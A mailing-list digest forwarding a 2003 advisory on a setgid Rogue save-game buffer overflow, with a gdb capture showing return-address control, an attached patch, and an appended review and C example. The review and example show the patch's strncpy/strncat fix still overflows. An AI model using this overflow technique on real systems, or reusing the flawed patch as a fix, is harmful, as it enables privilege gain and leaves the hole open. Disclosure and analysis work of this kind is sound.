[Please patch if you play Rogue on any platform -- Raju]

This is an RFC 1153 digest. (1 message)

----------------------------------------------------------------------
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-293465837-1442508392-1045861660=:12401"
Return-Path: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
From: Ulf Harnhammar <[EMAIL PROTECTED]>
Sender: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: [Full-Disclosure] Rogue buffer overflow
Date: Fri, 21 Feb 2003 22:07:40 +0100 (CET)

Rogue buffer overflow

PROGRAM: Rogue
VENDOR: Tim Stoehr et al.
DOWNLOAD URL: http://ibiblio.org/pub/Linux/games/dungeon/!INDEX.html (any file called "*rogue*" in that directory)
DMOZ/ODP: http://dmoz.org/Games/Video_Games/Roleplaying/Rogue-like/

DESCRIPTION:
Rogue is a text-based role-playing computer game with a long history. It is the first of the rogue-like games.

SUMMARY:
Rogue's save game function (capital S) suffers from a buffer overflow. The program is usually installed setgid games, so successful exploitation means getting that group's access rights.

TECHNICAL DETAILS:
If you specify a file name for saving beginning with a tilde (~), Rogue will replace that character with the contents of the environment variable HOME. This happens in the function save_into_file() in save.c. The concatenation of that environment variable with the rest of the file name takes place in a buffer of 80 characters, and the code doesn't check if it is overrun or not.

We can exploit this by giving the HOME environment variable a value that is 111 characters long, and by saving a game with a file name that is two characters long: a tilde (~) and one more character. That second character in the file name will be the highest byte in the address that the processor jumps to.
The other bytes in the address come from the HOME environment variable.

Here is a session capture that illustrates this problem:

$ export HOME=`perl -e 'print "U" x 111;'`
$ gdb rogue
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/vsu/secwork/rogue/rogue

[rogue session snipped]

file name? ~A
~A-more-
problem accessing the save file

Program received signal SIGSEGV, Segmentation fault.
0x41555555 in ?? ()
(gdb) bt
#0  0x41555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax            0x1f             31
ecx            0x656c69         6646889
edx            0xff646b68       -10196120
ebx            0x4213030c       1108542220
esp            0xbfffdd90       0xbfffdd90
ebp            0x55555555       0x55555555
esi            0x40013020       1073819680
edi            0xbfffde84       -1073750396
eip            0x41555555       0x41555555
eflags         0x10286          66182

COMMUNICATION WITH VENDOR:
The program seems to be unmaintained, so I wrote an unofficial patch instead.

MY PATCH:
I have attached a patch that corrects this problem. I have patched against rogue985.
// Ulf Harnhammar
VSU Security will audit PHP and Perl code for money
[EMAIL PROTECTED]

Attachment "rogue.patch" (Content-Type: TEXT/PLAIN; sent BASE64-encoded, shown here decoded):

--- save.c.old	Wed Feb 19 02:36:48 2003
+++ save.c	Wed Feb 19 02:47:33 2003
@@ -67,8 +67,10 @@
 
 	if (sfile[0] == '~') {
 		if (hptr = md_getenv("HOME")) {
-			(void) strcpy(name_buffer, hptr);
-			(void) strcat(name_buffer, sfile+1);
+			/* Security fix, Ulf Harnhammar 2003 */
+			(void) strncpy(name_buffer, hptr, sizeof(name_buffer));
+			(void) strncat(name_buffer, sfile+1, sizeof(name_buffer) - strlen(hptr));
+			name_buffer[sizeof(name_buffer) - 1] = '\0';
 			sfile = name_buffer;
 		}
 	}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

------------------------------

End of this Digest
******************

-- 
Raj Mathur  [EMAIL PROTECTED]  http://kandalaya.org/
It is the mind that moves

================================================
To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header.
Check archives at http://www.mail-archive.com/ilugd%40wpaa.org
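Review bot: the strncat bound `sizeof(name_buffer) - strlen(hptr)` in this hunk is computed in size_t and wraps to a huge value as soon as strlen(hptr) >= sizeof(name_buffer), which is exactly the 111-byte HOME the advisory exploits; in that same case `strncpy(name_buffer, hptr, sizeof(name_buffer))` leaves name_buffer without a terminating NUL, so strncat scans past the end of the buffer for the terminator and appends sfile+1 wherever that scan stops. The trailing `name_buffer[sizeof(name_buffer) - 1] = '\0'` runs only after those writes, so the overflow is not closed. There is also an off-by-one in the in-range case: strncat's limit counts source characters and always writes a NUL after them, so with a 79-byte HOME the bound is 1 and the NUL lands at name_buffer[80]. Suggest replacing the strncpy/strncat pair with a length check that refuses the save when `strlen(hptr) + strlen(sfile + 1) >= sizeof(name_buffer)`, followed by `snprintf(name_buffer, sizeof(name_buffer), "%s%s", hptr, sfile + 1)` (or checking snprintf's return value against sizeof(name_buffer)); if strncat is kept, its bound must be `sizeof(name_buffer) - strlen(name_buffer) - 1` after a strncpy that is guaranteed to terminate.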
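The overflow described in TECHNICAL DETAILS, worked through in code. This is an added example, not code from the advisory, the attached patch or the Rogue sources. It rebuilds the HOME plus rest-of-name concatenation that the strcpy/strcat pair in save_into_file() produces, but in a separate inspection buffer, and reads off which of its bytes land on the saved frame pointer and return address; the offsets 104 and 108 are inferred from the capture above (111 'U's followed by 'A' giving ebp 0x55555555 and eip 0x41555555), not read from the Rogue source. It also computes the bound the attached patch hands to strncat, and contrasts a snprintf-based expansion that refuses over-long names instead of overflowing or truncating. NAME_BUFFER_SIZE, advisory_home(), expand_home_safe() and the other names are this example's own, and the inputs are constructed here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Size of name_buffer in rogue's save_into_file(), as stated in the advisory. */
#define NAME_BUFFER_SIZE 80

/* Where the saved frame pointer and return address sit relative to name_buffer.
 * Inferred from the capture (HOME = 111 x 'U', file name "~A" gives ebp 0x55555555
 * and eip 0x41555555, so the 'A' is the top byte of the 4-byte little-endian slot
 * starting at offset 108), not taken from the Rogue source. */
#define EBP_OFFSET 104
#define RET_OFFSET 108

/* HOME value used in the advisory's session: 111 x 'U'. Constructed for this example. */
const char *advisory_home(void)
{
    static char home[112];
    if (home[0] == '\0') {
        memset(home, 'U', 111);
        home[111] = '\0';
    }
    return home;
}

/* Rebuild HOME ++ (sfile+1), exactly what the original strcpy/strcat pair writes
 * into name_buffer, but in a caller-supplied buffer large enough to hold it.
 * Returns the number of bytes written including the NUL, or 0 if out is too small. */
size_t build_expanded_name(const char *home, const char *sfile, char *out, size_t outlen)
{
    size_t hlen = strlen(home), rlen = strlen(sfile + 1);
    if (hlen + rlen + 1 > outlen)
        return 0;
    memcpy(out, home, hlen);
    memcpy(out + hlen, sfile + 1, rlen + 1);
    return hlen + rlen + 1;
}

/* 1 if the original code writes past the 80-byte name_buffer for these inputs. */
int original_overflows(const char *home, const char *sfile)
{
    return strlen(home) + strlen(sfile + 1) + 1 > NAME_BUFFER_SIZE;
}

/* The 32-bit little-endian word that lands at a given offset of the overflowed
 * buffer, i.e. what the CPU later pops into ebp or eip. 0 if the write stops short. */
uint32_t forged_stack_word(const char *home, const char *sfile, size_t off)
{
    char inspect[1024];
    size_t n = build_expanded_name(home, sfile, inspect, sizeof inspect);
    if (n == 0 || off + 4 > n)
        return 0;
    const unsigned char *p = (const unsigned char *)inspect + off;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Bound the attached patch passes to strncat: sizeof(name_buffer) - strlen(hptr),
 * computed in size_t. Once HOME is 80 bytes or longer this wraps to a huge value,
 * so the "bounded" strncat is not bounded at all. */
size_t patched_strncat_bound(const char *home)
{
    return (size_t)NAME_BUFFER_SIZE - strlen(home);
}

/* Hardened tilde expansion: snprintf with the real buffer size, and the save is
 * refused rather than silently truncated when the result would not fit.
 * Returns 0 on success, -1 if the expanded name does not fit in out. */
int expand_home_safe(const char *home, const char *sfile, char *out, size_t outlen)
{
    int n = (sfile[0] == '~') ? snprintf(out, outlen, "%s%s", home, sfile + 1)
                              : snprintf(out, outlen, "%s", sfile);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen > 0)
            out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Same check against an 80-byte buffer the size of Rogue's name_buffer. */
int expand_fits_name_buffer(const char *home, const char *sfile)
{
    char name_buffer[NAME_BUFFER_SIZE];
    return expand_home_safe(home, sfile, name_buffer, sizeof name_buffer);
}

int main(void)
{
    const char *home = advisory_home();
    const char *sfile = "~A";
    char name_buffer[NAME_BUFFER_SIZE];

    printf("HOME is %zu bytes, name_buffer holds %d: %s\n", strlen(home), NAME_BUFFER_SIZE,
           original_overflows(home, sfile) ? "overflow" : "fits");
    printf("saved ebp becomes 0x%08x, return address 0x%08x\n",
           (unsigned)forged_stack_word(home, sfile, EBP_OFFSET),
           (unsigned)forged_stack_word(home, sfile, RET_OFFSET));
    printf("patch's strncat bound for this HOME: %zu\n", patched_strncat_bound(home));

    if (expand_home_safe(home, sfile, name_buffer, sizeof name_buffer) != 0)
        printf("hardened: save refused, expanded name too long\n");
    if (expand_home_safe("/home/vsu", "~/rogue.save", name_buffer, sizeof name_buffer) == 0)
        printf("hardened: saving to %s\n", name_buffer);
    return 0;
}
```

Changing the second character of the file name changes only the top byte of the forged return address, which is why the advisory calls it "the highest byte in the address that the processor jumps to"; the three bytes below it, and the whole saved frame pointer, come from HOME, which the user fully controls even though the binary runs setgid.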
